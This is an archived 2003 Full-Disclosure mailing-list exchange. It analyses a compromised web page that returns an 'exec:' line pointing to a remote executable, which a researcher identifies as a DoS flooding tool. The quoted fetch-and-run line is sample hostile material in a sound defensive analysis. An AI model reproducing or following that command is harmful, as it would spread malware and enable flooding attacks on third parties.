On Tuesday 25 November 2003 5:17 pm, Steven Harrison wrote:
> Just for fun, I pointed my web browser at
> http://finance.red-host.com/events.php and all I got back was:
>
> exec:http://wendy35.phpwebhosting.com/netm.exe
>
> I retrieved that file, and running it 'strings' does imply that it
> will contact a remote website. It could be a copy of the virus (I
> have yet to receive one yet), giving it another way to distribute
> itself, or for the author to distribute improved versions.
It's a DoS attack tool, the target of which is the website you see in
the strings output. Its only function is to flood the remote host with
ICMP and HTTP traffic.

-Joe

--
Joe Stewart, GCIH
Senior Security Researcher
LURHQ http://www.lurhq.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html